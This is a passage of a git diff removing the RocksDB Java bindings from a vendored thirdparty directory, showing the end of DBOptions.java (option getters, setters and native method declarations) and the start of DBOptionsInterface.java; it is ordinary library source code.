-    assert(isOwningHandle());
-    setCreateIfMissing(nativeHandle_, flag);
-    return this;
-  }
-
-  @Override
-  public boolean createIfMissing() {
-    assert(isOwningHandle());
-    return createIfMissing(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setCreateMissingColumnFamilies(
-      final boolean flag) {
-    assert(isOwningHandle());
-    setCreateMissingColumnFamilies(nativeHandle_, flag);
-    return this;
-  }
-
-  @Override
-  public boolean createMissingColumnFamilies() {
-    assert(isOwningHandle());
-    return createMissingColumnFamilies(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setEnv(final Env env) {
-    setEnv(nativeHandle_, env.nativeHandle_);
-    this.env_ = env;
-    return this;
-  }
-
-  @Override
-  public Env getEnv() {
-    return env_;
-  }
-
-  @Override
-  public DBOptions setErrorIfExists(
-      final boolean errorIfExists) {
-    assert(isOwningHandle());
-    setErrorIfExists(nativeHandle_, errorIfExists);
-    return this;
-  }
-
-  @Override
-  public boolean errorIfExists() {
-    assert(isOwningHandle());
-    return errorIfExists(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setParanoidChecks(
-      final boolean paranoidChecks) {
-    assert(isOwningHandle());
-    setParanoidChecks(nativeHandle_, paranoidChecks);
-    return this;
-  }
-
-  @Override
-  public boolean paranoidChecks() {
-    assert(isOwningHandle());
-    return paranoidChecks(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setRateLimiter(final RateLimiter rateLimiter) {
-    assert(isOwningHandle());
-    rateLimiter_ = rateLimiter;
-    setRateLimiter(nativeHandle_, rateLimiter.nativeHandle_);
-    return this;
-  }
-
-  @Override
-  public DBOptions setLogger(final Logger logger) {
-    assert(isOwningHandle());
-    setLogger(nativeHandle_, logger.nativeHandle_);
-    return this;
-  }
-
-  @Override
-  public DBOptions setInfoLogLevel(
-      final InfoLogLevel infoLogLevel) {
-    assert(isOwningHandle());
-    setInfoLogLevel(nativeHandle_, infoLogLevel.getValue());
-    return this;
-  }
-
-  @Override
-  public InfoLogLevel infoLogLevel() {
-    assert(isOwningHandle());
-    return InfoLogLevel.getInfoLogLevel(
-        infoLogLevel(nativeHandle_));
-  }
-
-  @Override
-  public DBOptions setMaxOpenFiles(
-      final int maxOpenFiles) {
-    assert(isOwningHandle());
-    setMaxOpenFiles(nativeHandle_, maxOpenFiles);
-    return this;
-  }
-
-  @Override
-  public int maxOpenFiles() {
-    assert(isOwningHandle());
-    return maxOpenFiles(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setMaxFileOpeningThreads(final int maxFileOpeningThreads) {
-    assert(isOwningHandle());
-    setMaxFileOpeningThreads(nativeHandle_, maxFileOpeningThreads);
-    return this;
-  }
-
-  @Override
-  public int maxFileOpeningThreads() {
-    assert(isOwningHandle());
-    return maxFileOpeningThreads(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setMaxTotalWalSize(
-      final long maxTotalWalSize) {
-    assert(isOwningHandle());
-    setMaxTotalWalSize(nativeHandle_, maxTotalWalSize);
-    return this;
-  }
-
-  @Override
-  public long maxTotalWalSize() {
-    assert(isOwningHandle());
-    return maxTotalWalSize(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setStatistics(final Statistics statistics) {
-    assert(isOwningHandle());
-    setStatistics(nativeHandle_, statistics.nativeHandle_);
-    return this;
-  }
-
-  @Override
-  public Statistics statistics() {
-    assert(isOwningHandle());
-    final long statisticsNativeHandle = statistics(nativeHandle_);
-    if(statisticsNativeHandle == 0) {
-      return null;
-    } else {
-      return new Statistics(statisticsNativeHandle);
-    }
-  }
-
-  @Override
-  public DBOptions setUseFsync(
-      final boolean useFsync) {
-    assert(isOwningHandle());
-    setUseFsync(nativeHandle_, useFsync);
-    return this;
-  }
-
-  @Override
-  public boolean useFsync() {
-    assert(isOwningHandle());
-    return useFsync(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setDbPaths(final Collection<DbPath> dbPaths) {
-    assert(isOwningHandle());
-
-    final int len = dbPaths.size();
-    final String paths[] = new String[len];
-    final long targetSizes[] = new long[len];
-
-    int i = 0;
-    for(final DbPath dbPath : dbPaths) {
-      paths[i] = dbPath.path.toString();
-      targetSizes[i] = dbPath.targetSize;
-      i++;
-    }
-    setDbPaths(nativeHandle_, paths, targetSizes);
-    return this;
-  }
-
-  @Override
-  public List<DbPath> dbPaths() {
-    final int len = (int)dbPathsLen(nativeHandle_);
-    if(len == 0) {
-      return Collections.emptyList();
-    } else {
-      final String paths[] = new String[len];
-      final long targetSizes[] = new long[len];
-
-      dbPaths(nativeHandle_, paths, targetSizes);
-
-      final List<DbPath> dbPaths = new ArrayList<>();
-      for(int i = 0; i < len; i++) {
-        dbPaths.add(new DbPath(Paths.get(paths[i]), targetSizes[i]));
-      }
-      return dbPaths;
-    }
-  }
-
-  @Override
-  public DBOptions setDbLogDir(
-      final String dbLogDir) {
-    assert(isOwningHandle());
-    setDbLogDir(nativeHandle_, dbLogDir);
-    return this;
-  }
-
-  @Override
-  public String dbLogDir() {
-    assert(isOwningHandle());
-    return dbLogDir(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setWalDir(
-      final String walDir) {
-    assert(isOwningHandle());
-    setWalDir(nativeHandle_, walDir);
-    return this;
-  }
-
-  @Override
-  public String walDir() {
-    assert(isOwningHandle());
-    return walDir(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setDeleteObsoleteFilesPeriodMicros(
-      final long micros) {
-    assert(isOwningHandle());
-    setDeleteObsoleteFilesPeriodMicros(nativeHandle_, micros);
-    return this;
-  }
-
-  @Override
-  public long deleteObsoleteFilesPeriodMicros() {
-    assert(isOwningHandle());
-    return deleteObsoleteFilesPeriodMicros(nativeHandle_);
-  }
-
-  @Override
-  public void setBaseBackgroundCompactions(
-      final int baseBackgroundCompactions) {
-    assert(isOwningHandle());
-    setBaseBackgroundCompactions(nativeHandle_, baseBackgroundCompactions);
-  }
-
-  @Override
-  public int baseBackgroundCompactions() {
-    assert(isOwningHandle());
-    return baseBackgroundCompactions(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setMaxBackgroundCompactions(
-      final int maxBackgroundCompactions) {
-    assert(isOwningHandle());
-    setMaxBackgroundCompactions(nativeHandle_, maxBackgroundCompactions);
-    return this;
-  }
-
-  @Override
-  public int maxBackgroundCompactions() {
-    assert(isOwningHandle());
-    return maxBackgroundCompactions(nativeHandle_);
-  }
-
-  @Override
-  public void setMaxSubcompactions(final int maxSubcompactions) {
-    assert(isOwningHandle());
-    setMaxSubcompactions(nativeHandle_, maxSubcompactions);
-  }
-
-  @Override
-  public int maxSubcompactions() {
-    assert(isOwningHandle());
-    return maxSubcompactions(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setMaxBackgroundFlushes(
-      final int maxBackgroundFlushes) {
-    assert(isOwningHandle());
-    setMaxBackgroundFlushes(nativeHandle_, maxBackgroundFlushes);
-    return this;
-  }
-
-  @Override
-  public int maxBackgroundFlushes() {
-    assert(isOwningHandle());
-    return maxBackgroundFlushes(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setMaxLogFileSize(
-      final long maxLogFileSize) {
-    assert(isOwningHandle());
-    setMaxLogFileSize(nativeHandle_, maxLogFileSize);
-    return this;
-  }
-
-  @Override
-  public long maxLogFileSize() {
-    assert(isOwningHandle());
-    return maxLogFileSize(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setLogFileTimeToRoll(
-      final long logFileTimeToRoll) {
-    assert(isOwningHandle());
-    setLogFileTimeToRoll(nativeHandle_, logFileTimeToRoll);
-    return this;
-  }
-
-  @Override
-  public long logFileTimeToRoll() {
-    assert(isOwningHandle());
-    return logFileTimeToRoll(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setKeepLogFileNum(
-      final long keepLogFileNum) {
-    assert(isOwningHandle());
-    setKeepLogFileNum(nativeHandle_, keepLogFileNum);
-    return this;
-  }
-
-  @Override
-  public long keepLogFileNum() {
-    assert(isOwningHandle());
-    return keepLogFileNum(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setRecycleLogFileNum(final long recycleLogFileNum) {
-    assert(isOwningHandle());
-    setRecycleLogFileNum(nativeHandle_, recycleLogFileNum);
-    return this;
-  }
-
-  @Override
-  public long recycleLogFileNum() {
-    assert(isOwningHandle());
-    return recycleLogFileNum(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setMaxManifestFileSize(
-      final long maxManifestFileSize) {
-    assert(isOwningHandle());
-    setMaxManifestFileSize(nativeHandle_, maxManifestFileSize);
-    return this;
-  }
-
-  @Override
-  public long maxManifestFileSize() {
-    assert(isOwningHandle());
-    return maxManifestFileSize(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setTableCacheNumshardbits(
-      final int tableCacheNumshardbits) {
-    assert(isOwningHandle());
-    setTableCacheNumshardbits(nativeHandle_, tableCacheNumshardbits);
-    return this;
-  }
-
-  @Override
-  public int tableCacheNumshardbits() {
-    assert(isOwningHandle());
-    return tableCacheNumshardbits(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setWalTtlSeconds(
-      final long walTtlSeconds) {
-    assert(isOwningHandle());
-    setWalTtlSeconds(nativeHandle_, walTtlSeconds);
-    return this;
-  }
-
-  @Override
-  public long walTtlSeconds() {
-    assert(isOwningHandle());
-    return walTtlSeconds(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setWalSizeLimitMB(
-      final long sizeLimitMB) {
-    assert(isOwningHandle());
-    setWalSizeLimitMB(nativeHandle_, sizeLimitMB);
-    return this;
-  }
-
-  @Override
-  public long walSizeLimitMB() {
-    assert(isOwningHandle());
-    return walSizeLimitMB(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setManifestPreallocationSize(
-      final long size) {
-    assert(isOwningHandle());
-    setManifestPreallocationSize(nativeHandle_, size);
-    return this;
-  }
-
-  @Override
-  public long manifestPreallocationSize() {
-    assert(isOwningHandle());
-    return manifestPreallocationSize(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setUseDirectReads(
-      final boolean useDirectReads) {
-    assert(isOwningHandle());
-    setUseDirectReads(nativeHandle_, useDirectReads);
-    return this;
-  }
-
-  @Override
-  public boolean useDirectReads() {
-    assert(isOwningHandle());
-    return useDirectReads(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setUseDirectIoForFlushAndCompaction(
-      final boolean useDirectIoForFlushAndCompaction) {
-    assert(isOwningHandle());
-    setUseDirectIoForFlushAndCompaction(nativeHandle_,
-        useDirectIoForFlushAndCompaction);
-    return this;
-  }
-
-  @Override
-  public boolean useDirectIoForFlushAndCompaction() {
-    assert(isOwningHandle());
-    return useDirectIoForFlushAndCompaction(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setAllowFAllocate(final boolean allowFAllocate) {
-    assert(isOwningHandle());
-    setAllowFAllocate(nativeHandle_, allowFAllocate);
-    return this;
-  }
-
-  @Override
-  public boolean allowFAllocate() {
-    assert(isOwningHandle());
-    return allowFAllocate(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setAllowMmapReads(
-      final boolean allowMmapReads) {
-    assert(isOwningHandle());
-    setAllowMmapReads(nativeHandle_, allowMmapReads);
-    return this;
-  }
-
-  @Override
-  public boolean allowMmapReads() {
-    assert(isOwningHandle());
-    return allowMmapReads(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setAllowMmapWrites(
-      final boolean allowMmapWrites) {
-    assert(isOwningHandle());
-    setAllowMmapWrites(nativeHandle_, allowMmapWrites);
-    return this;
-  }
-
-  @Override
-  public boolean allowMmapWrites() {
-    assert(isOwningHandle());
-    return allowMmapWrites(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setIsFdCloseOnExec(
-      final boolean isFdCloseOnExec) {
-    assert(isOwningHandle());
-    setIsFdCloseOnExec(nativeHandle_, isFdCloseOnExec);
-    return this;
-  }
-
-  @Override
-  public boolean isFdCloseOnExec() {
-    assert(isOwningHandle());
-    return isFdCloseOnExec(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setStatsDumpPeriodSec(
-      final int statsDumpPeriodSec) {
-    assert(isOwningHandle());
-    setStatsDumpPeriodSec(nativeHandle_, statsDumpPeriodSec);
-    return this;
-  }
-
-  @Override
-  public int statsDumpPeriodSec() {
-    assert(isOwningHandle());
-    return statsDumpPeriodSec(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setAdviseRandomOnOpen(
-      final boolean adviseRandomOnOpen) {
-    assert(isOwningHandle());
-    setAdviseRandomOnOpen(nativeHandle_, adviseRandomOnOpen);
-    return this;
-  }
-
-  @Override
-  public boolean adviseRandomOnOpen() {
-    return adviseRandomOnOpen(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setDbWriteBufferSize(final long dbWriteBufferSize) {
-    assert(isOwningHandle());
-    setDbWriteBufferSize(nativeHandle_, dbWriteBufferSize);
-    return this;
-  }
-
-  @Override
-  public long dbWriteBufferSize() {
-    assert(isOwningHandle());
-    return dbWriteBufferSize(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setAccessHintOnCompactionStart(final AccessHint accessHint) {
-    assert(isOwningHandle());
-    setAccessHintOnCompactionStart(nativeHandle_, accessHint.getValue());
-    return this;
-  }
-
-  @Override
-  public AccessHint accessHintOnCompactionStart() {
-    assert(isOwningHandle());
-    return AccessHint.getAccessHint(accessHintOnCompactionStart(nativeHandle_));
-  }
-
-  @Override
-  public DBOptions setNewTableReaderForCompactionInputs(
-      final boolean newTableReaderForCompactionInputs) {
-    assert(isOwningHandle());
-    setNewTableReaderForCompactionInputs(nativeHandle_,
-        newTableReaderForCompactionInputs);
-    return this;
-  }
-
-  @Override
-  public boolean newTableReaderForCompactionInputs() {
-    assert(isOwningHandle());
-    return newTableReaderForCompactionInputs(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setCompactionReadaheadSize(final long compactionReadaheadSize) {
-    assert(isOwningHandle());
-    setCompactionReadaheadSize(nativeHandle_, compactionReadaheadSize);
-    return this;
-  }
-
-  @Override
-  public long compactionReadaheadSize() {
-    assert(isOwningHandle());
-    return compactionReadaheadSize(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setRandomAccessMaxBufferSize(final long randomAccessMaxBufferSize) {
-    assert(isOwningHandle());
-    setRandomAccessMaxBufferSize(nativeHandle_, randomAccessMaxBufferSize);
-    return this;
-  }
-
-  @Override
-  public long randomAccessMaxBufferSize() {
-    assert(isOwningHandle());
-    return randomAccessMaxBufferSize(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setWritableFileMaxBufferSize(final long writableFileMaxBufferSize) {
-    assert(isOwningHandle());
-    setWritableFileMaxBufferSize(nativeHandle_, writableFileMaxBufferSize);
-    return this;
-  }
-
-  @Override
-  public long writableFileMaxBufferSize() {
-    assert(isOwningHandle());
-    return writableFileMaxBufferSize(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setUseAdaptiveMutex(
-      final boolean useAdaptiveMutex) {
-    assert(isOwningHandle());
-    setUseAdaptiveMutex(nativeHandle_, useAdaptiveMutex);
-    return this;
-  }
-
-  @Override
-  public boolean useAdaptiveMutex() {
-    assert(isOwningHandle());
-    return useAdaptiveMutex(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setBytesPerSync(
-      final long bytesPerSync) {
-    assert(isOwningHandle());
-    setBytesPerSync(nativeHandle_, bytesPerSync);
-    return this;
-  }
-
-  @Override
-  public long bytesPerSync() {
-    return bytesPerSync(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setWalBytesPerSync(final long walBytesPerSync) {
-    assert(isOwningHandle());
-    setWalBytesPerSync(nativeHandle_, walBytesPerSync);
-    return this;
-  }
-
-  @Override
-  public long walBytesPerSync() {
-    assert(isOwningHandle());
-    return walBytesPerSync(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setEnableThreadTracking(final boolean enableThreadTracking) {
-    assert(isOwningHandle());
-    setEnableThreadTracking(nativeHandle_, enableThreadTracking);
-    return this;
-  }
-
-  @Override
-  public boolean enableThreadTracking() {
-    assert(isOwningHandle());
-    return enableThreadTracking(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setDelayedWriteRate(final long delayedWriteRate) {
-    assert(isOwningHandle());
-    setDelayedWriteRate(nativeHandle_, delayedWriteRate);
-    return this;
-  }
-
-  @Override
-  public long delayedWriteRate(){
-    return delayedWriteRate(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setAllowConcurrentMemtableWrite(
-      final boolean allowConcurrentMemtableWrite) {
-    setAllowConcurrentMemtableWrite(nativeHandle_,
-        allowConcurrentMemtableWrite);
-    return this;
-  }
-
-  @Override
-  public boolean allowConcurrentMemtableWrite() {
-    return allowConcurrentMemtableWrite(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setEnableWriteThreadAdaptiveYield(
-      final boolean enableWriteThreadAdaptiveYield) {
-    setEnableWriteThreadAdaptiveYield(nativeHandle_,
-        enableWriteThreadAdaptiveYield);
-    return this;
-  }
-
-  @Override
-  public boolean enableWriteThreadAdaptiveYield() {
-    return enableWriteThreadAdaptiveYield(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setWriteThreadMaxYieldUsec(final long writeThreadMaxYieldUsec) {
-    setWriteThreadMaxYieldUsec(nativeHandle_, writeThreadMaxYieldUsec);
-    return this;
-  }
-
-  @Override
-  public long writeThreadMaxYieldUsec() {
-    return writeThreadMaxYieldUsec(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setWriteThreadSlowYieldUsec(final long writeThreadSlowYieldUsec) {
-    setWriteThreadSlowYieldUsec(nativeHandle_, writeThreadSlowYieldUsec);
-    return this;
-  }
-
-  @Override
-  public long writeThreadSlowYieldUsec() {
-    return writeThreadSlowYieldUsec(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setSkipStatsUpdateOnDbOpen(final boolean skipStatsUpdateOnDbOpen) {
-    assert(isOwningHandle());
-    setSkipStatsUpdateOnDbOpen(nativeHandle_, skipStatsUpdateOnDbOpen);
-    return this;
-  }
-
-  @Override
-  public boolean skipStatsUpdateOnDbOpen() {
-    assert(isOwningHandle());
-    return skipStatsUpdateOnDbOpen(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setWalRecoveryMode(final WALRecoveryMode walRecoveryMode) {
-    assert(isOwningHandle());
-    setWalRecoveryMode(nativeHandle_, walRecoveryMode.getValue());
-    return this;
-  }
-
-  @Override
-  public WALRecoveryMode walRecoveryMode() {
-    assert(isOwningHandle());
-    return WALRecoveryMode.getWALRecoveryMode(walRecoveryMode(nativeHandle_));
-  }
-
-  @Override
-  public DBOptions setAllow2pc(final boolean allow2pc) {
-    assert(isOwningHandle());
-    setAllow2pc(nativeHandle_, allow2pc);
-    return this;
-  }
-
-  @Override
-  public boolean allow2pc() {
-    assert(isOwningHandle());
-    return allow2pc(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setRowCache(final Cache rowCache) {
-    assert(isOwningHandle());
-    setRowCache(nativeHandle_, rowCache.nativeHandle_);
-    this.rowCache_ = rowCache;
-    return this;
-  }
-
-  @Override
-  public Cache rowCache() {
-    assert(isOwningHandle());
-    return this.rowCache_;
-  }
-
-  @Override
-  public DBOptions setFailIfOptionsFileError(final boolean failIfOptionsFileError) {
-    assert(isOwningHandle());
-    setFailIfOptionsFileError(nativeHandle_, failIfOptionsFileError);
-    return this;
-  }
-
-  @Override
-  public boolean failIfOptionsFileError() {
-    assert(isOwningHandle());
-    return failIfOptionsFileError(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setDumpMallocStats(final boolean dumpMallocStats) {
-    assert(isOwningHandle());
-    setDumpMallocStats(nativeHandle_, dumpMallocStats);
-    return this;
-  }
-
-  @Override
-  public boolean dumpMallocStats() {
-    assert(isOwningHandle());
-    return dumpMallocStats(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setAvoidFlushDuringRecovery(final boolean avoidFlushDuringRecovery) {
-    assert(isOwningHandle());
-    setAvoidFlushDuringRecovery(nativeHandle_, avoidFlushDuringRecovery);
-    return this;
-  }
-
-  @Override
-  public boolean avoidFlushDuringRecovery() {
-    assert(isOwningHandle());
-    return avoidFlushDuringRecovery(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setAvoidFlushDuringShutdown(final boolean avoidFlushDuringShutdown) {
-    assert(isOwningHandle());
-    setAvoidFlushDuringShutdown(nativeHandle_, avoidFlushDuringShutdown);
-    return this;
-  }
-
-  @Override
-  public boolean avoidFlushDuringShutdown() {
-    assert(isOwningHandle());
-    return avoidFlushDuringShutdown(nativeHandle_);
-  }
-
-  static final int DEFAULT_NUM_SHARD_BITS = -1;
-
-
-
-
-  /**
-   * <p>Private constructor to be used by
-   * {@link #getDBOptionsFromProps(java.util.Properties)}</p>
-   *
-   * @param nativeHandle native handle to DBOptions instance.
-   */
-  private DBOptions(final long nativeHandle) {
-    super(nativeHandle);
-  }
-
-  private static native long getDBOptionsFromProps(
-      String optString);
-
-  private native static long newDBOptions();
-  @Override protected final native void disposeInternal(final long handle);
-
-  private native void optimizeForSmallDb(final long handle);
-  private native void setIncreaseParallelism(long handle, int totalThreads);
-  private native void setCreateIfMissing(long handle, boolean flag);
-  private native boolean createIfMissing(long handle);
-  private native void setCreateMissingColumnFamilies(
-      long handle, boolean flag);
-  private native boolean createMissingColumnFamilies(long handle);
-  private native void setEnv(long handle, long envHandle);
-  private native void setErrorIfExists(long handle, boolean errorIfExists);
-  private native boolean errorIfExists(long handle);
-  private native void setParanoidChecks(
-      long handle, boolean paranoidChecks);
-  private native boolean paranoidChecks(long handle);
-  private native void setRateLimiter(long handle,
-      long rateLimiterHandle);
-  private native void setLogger(long handle,
-      long loggerHandle);
-  private native void setInfoLogLevel(long handle, byte logLevel);
-  private native byte infoLogLevel(long handle);
-  private native void setMaxOpenFiles(long handle, int maxOpenFiles);
-  private native int maxOpenFiles(long handle);
-  private native void setMaxFileOpeningThreads(final long handle,
-      final int maxFileOpeningThreads);
-  private native int maxFileOpeningThreads(final long handle);
-  private native void setMaxTotalWalSize(long handle,
-      long maxTotalWalSize);
-  private native long maxTotalWalSize(long handle);
-  private native void setStatistics(final long handle, final long statisticsHandle);
-  private native long statistics(final long handle);
-  private native boolean useFsync(long handle);
-  private native void setUseFsync(long handle, boolean useFsync);
-  private native void setDbPaths(final long handle, final String[] paths,
-      final long[] targetSizes);
-  private native long dbPathsLen(final long handle);
-  private native void dbPaths(final long handle, final String[] paths,
-                                 final long[] targetSizes);
-  private native void setDbLogDir(long handle, String dbLogDir);
-  private native String dbLogDir(long handle);
-  private native void setWalDir(long handle, String walDir);
-  private native String walDir(long handle);
-  private native void setDeleteObsoleteFilesPeriodMicros(
-      long handle, long micros);
-  private native long deleteObsoleteFilesPeriodMicros(long handle);
-  private native void setBaseBackgroundCompactions(long handle,
-      int baseBackgroundCompactions);
-  private native int baseBackgroundCompactions(long handle);
-  private native void setMaxBackgroundCompactions(
-      long handle, int maxBackgroundCompactions);
-  private native int maxBackgroundCompactions(long handle);
-  private native void setMaxSubcompactions(long handle, int maxSubcompactions);
-  private native int maxSubcompactions(long handle);
-  private native void setMaxBackgroundFlushes(
-      long handle, int maxBackgroundFlushes);
-  private native int maxBackgroundFlushes(long handle);
-  private native void setMaxLogFileSize(long handle, long maxLogFileSize)
-      throws IllegalArgumentException;
-  private native long maxLogFileSize(long handle);
-  private native void setLogFileTimeToRoll(
-      long handle, long logFileTimeToRoll) throws IllegalArgumentException;
-  private native long logFileTimeToRoll(long handle);
-  private native void setKeepLogFileNum(long handle, long keepLogFileNum)
-      throws IllegalArgumentException;
-  private native long keepLogFileNum(long handle);
-  private native void setRecycleLogFileNum(long handle, long recycleLogFileNum);
-  private native long recycleLogFileNum(long handle);
-  private native void setMaxManifestFileSize(
-      long handle, long maxManifestFileSize);
-  private native long maxManifestFileSize(long handle);
-  private native void setTableCacheNumshardbits(
-      long handle, int tableCacheNumshardbits);
-  private native int tableCacheNumshardbits(long handle);
-  private native void setWalTtlSeconds(long handle, long walTtlSeconds);
-  private native long walTtlSeconds(long handle);
-  private native void setWalSizeLimitMB(long handle, long sizeLimitMB);
-  private native long walSizeLimitMB(long handle);
-  private native void setManifestPreallocationSize(
-      long handle, long size) throws IllegalArgumentException;
-  private native long manifestPreallocationSize(long handle);
-  private native void setUseDirectReads(long handle, boolean useDirectReads);
-  private native boolean useDirectReads(long handle);
-  private native void setUseDirectIoForFlushAndCompaction(
-      long handle, boolean useDirectIoForFlushAndCompaction);
-  private native boolean useDirectIoForFlushAndCompaction(long handle);
-  private native void setAllowFAllocate(final long handle,
-      final boolean allowFAllocate);
-  private native boolean allowFAllocate(final long handle);
-  private native void setAllowMmapReads(
-      long handle, boolean allowMmapReads);
-  private native boolean allowMmapReads(long handle);
-  private native void setAllowMmapWrites(
-      long handle, boolean allowMmapWrites);
-  private native boolean allowMmapWrites(long handle);
-  private native void setIsFdCloseOnExec(
-      long handle, boolean isFdCloseOnExec);
-  private native boolean isFdCloseOnExec(long handle);
-  private native void setStatsDumpPeriodSec(
-      long handle, int statsDumpPeriodSec);
-  private native int statsDumpPeriodSec(long handle);
-  private native void setAdviseRandomOnOpen(
-      long handle, boolean adviseRandomOnOpen);
-  private native boolean adviseRandomOnOpen(long handle);
-  private native void setDbWriteBufferSize(final long handle,
-      final long dbWriteBufferSize);
-  private native long dbWriteBufferSize(final long handle);
-  private native void setAccessHintOnCompactionStart(final long handle,
-      final byte accessHintOnCompactionStart);
-  private native byte accessHintOnCompactionStart(final long handle);
-  private native void setNewTableReaderForCompactionInputs(final long handle,
-      final boolean newTableReaderForCompactionInputs);
-  private native boolean newTableReaderForCompactionInputs(final long handle);
-  private native void setCompactionReadaheadSize(final long handle,
-      final long compactionReadaheadSize);
-  private native long compactionReadaheadSize(final long handle);
-  private native void setRandomAccessMaxBufferSize(final long handle,
-      final long randomAccessMaxBufferSize);
-  private native long randomAccessMaxBufferSize(final long handle);
-  private native void setWritableFileMaxBufferSize(final long handle,
-      final long writableFileMaxBufferSize);
-  private native long writableFileMaxBufferSize(final long handle);
-  private native void setUseAdaptiveMutex(
-      long handle, boolean useAdaptiveMutex);
-  private native boolean useAdaptiveMutex(long handle);
-  private native void setBytesPerSync(
-      long handle, long bytesPerSync);
-  private native long bytesPerSync(long handle);
-  private native void setWalBytesPerSync(long handle, long walBytesPerSync);
-  private native long walBytesPerSync(long handle);
-  private native void setEnableThreadTracking(long handle,
-      boolean enableThreadTracking);
-  private native boolean enableThreadTracking(long handle);
-  private native void setDelayedWriteRate(long handle, long delayedWriteRate);
-  private native long delayedWriteRate(long handle);
-  private native void setAllowConcurrentMemtableWrite(long handle,
-      boolean allowConcurrentMemtableWrite);
-  private native boolean allowConcurrentMemtableWrite(long handle);
-  private native void setEnableWriteThreadAdaptiveYield(long handle,
-      boolean enableWriteThreadAdaptiveYield);
-  private native boolean enableWriteThreadAdaptiveYield(long handle);
-  private native void setWriteThreadMaxYieldUsec(long handle,
-      long writeThreadMaxYieldUsec);
-  private native long writeThreadMaxYieldUsec(long handle);
-  private native void setWriteThreadSlowYieldUsec(long handle,
-      long writeThreadSlowYieldUsec);
-  private native long writeThreadSlowYieldUsec(long handle);
-  private native void setSkipStatsUpdateOnDbOpen(final long handle,
-      final boolean skipStatsUpdateOnDbOpen);
-  private native boolean skipStatsUpdateOnDbOpen(final long handle);
-  private native void setWalRecoveryMode(final long handle,
-      final byte walRecoveryMode);
-  private native byte walRecoveryMode(final long handle);
-  private native void setAllow2pc(final long handle,
-      final boolean allow2pc);
-  private native boolean allow2pc(final long handle);
-  private native void setRowCache(final long handle,
-      final long row_cache_handle);
-  private native void setFailIfOptionsFileError(final long handle,
-      final boolean failIfOptionsFileError);
-  private native boolean failIfOptionsFileError(final long handle);
-  private native void setDumpMallocStats(final long handle,
-      final boolean dumpMallocStats);
-  private native boolean dumpMallocStats(final long handle);
-  private native void setAvoidFlushDuringRecovery(final long handle,
-      final boolean avoidFlushDuringRecovery);
-  private native boolean avoidFlushDuringRecovery(final long handle);
-  private native void setAvoidFlushDuringShutdown(final long handle,
-      final boolean avoidFlushDuringShutdown);
-  private native boolean avoidFlushDuringShutdown(final long handle);
-
-  // instance variables
-  private Env env_;
-  private int numShardBits_;
-  private RateLimiter rateLimiter_;
-  private Cache rowCache_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/DBOptionsInterface.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/DBOptionsInterface.java
deleted file mode 100644
index 50ca083..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/DBOptionsInterface.java
+++ /dev/null
@@ -1,1549 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.util.Collection;
-import java.util.List;
-
-public interface DBOptionsInterface<T extends DBOptionsInterface> {
-
-  /**
-   * Use this if your DB is very small (like under 1GB) and you don't want to
-   * spend lots of memory for memtables.
-   *
-   * @return the instance of the current object.
-   */
-  T optimizeForSmallDb();
-
-  /**
-   * Use the specified object to interact with the environment,
-   * e.g. to read/write files, schedule background work, etc.
-   * Default: {@link Env#getDefault()}
-   *
-   * @param env {@link Env} instance.
-   * @return the instance of the current Options.
-   */
-  T setEnv(final Env env);
-
-  /**
-   * Returns the set RocksEnv instance.
-   *
-   * @return {@link RocksEnv} instance set in the options.
-   */
-  Env getEnv();
-
-  /**
-   * <p>By default, RocksDB uses only one background thread for flush and
-   * compaction. Calling this function will set it up such that total of
-   * `total_threads` is used.</p>
-   *
-   * <p>You almost definitely want to call this function if your system is
